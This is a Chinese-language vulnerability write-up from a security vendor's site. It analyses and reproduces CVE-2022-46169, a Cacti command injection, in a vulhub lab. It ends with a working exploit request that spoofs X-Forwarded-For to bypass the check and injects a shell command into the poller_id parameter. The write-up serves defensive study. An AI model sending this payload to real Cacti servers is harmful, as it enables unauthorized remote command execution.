CVE-2022-46169 Cacti前台命令注入漏洞简析





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

四年同行，韧性共铸：西南某商行携手美创科技再度通过年度容灾大考

2025-12-26

以“AI+数据安全”领雁！祝贺美创牵头项目入选浙江省科技厅“尖兵领雁”计划！

2025-12-22

美创AI灾备专家：引领灾备领域迈入“智能化”时代

2025-12-15

热点观察｜美创科技丁斐：数据安全 × 价值共创？可信数据空间的 “双向奔赴”

2025-12-03

美创科技高校供应链数据安全方案斩获 2025 年度 “金智奖”

2025-12-03

Strix自动渗透测试平台搭建与使用

2025-12-22

每周安全速递³⁷⁰ | 勒索软件攻击导致心理健康机构超11万人数据泄露

2025-12-19

每周安全速递³⁶⁹ | 安卓勒索软件DroidLock针对西班牙语言用户进行攻击

2025-12-15

每周安全速递³⁶⁸ | 美国电信与汽车服务巨头遭Cl0p勒索攻击

2025-12-05

每周安全速递³⁶⁷ | ShinyHunters 开发新型勒索软件ShinySp1d3r

2025-11-21

CVE-2022-46169 Cacti前台命令注入漏洞简析

发布时间：2023-01-13 阅读次数： 816 次

漏洞概述

Cacti项目是一个开源平台，可为用户提供强大且可扩展的操作监控和故障管理框架。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号：CVE-2022-46169，漏洞等级：严重。

环境搭建

本次使用vulhub搭建本地测试环境进行复现：

执行以下命令，将vulhub环境拉取到本地。

git clone https://github.com/vulhub/vulhub

执行以下命令，启动一个Cacti 1.2.22版本服务器。

cd vulhub-ｍａｓｔｅｒ/cacti/CVE-2022-46169docker-compose up -d

执行docker ps命令查看容器运行状况

环境启动后，访问http://your-ip:8080会跳转到登录页面，使用admin/admin作为账号密码登录，并根据页面中的提示进行初始化，不断点击“下一步”，直到安装成功：

这个漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器。所以，我们在Cacti后台首页创建一个新的Graph：

选择的Graph Type是“Device - Uptime”，点击创建：

漏洞复现

利用POC发送如下数据包：

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1X-Forwarded-For: 127.0.0.1Host: localhost.lanUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1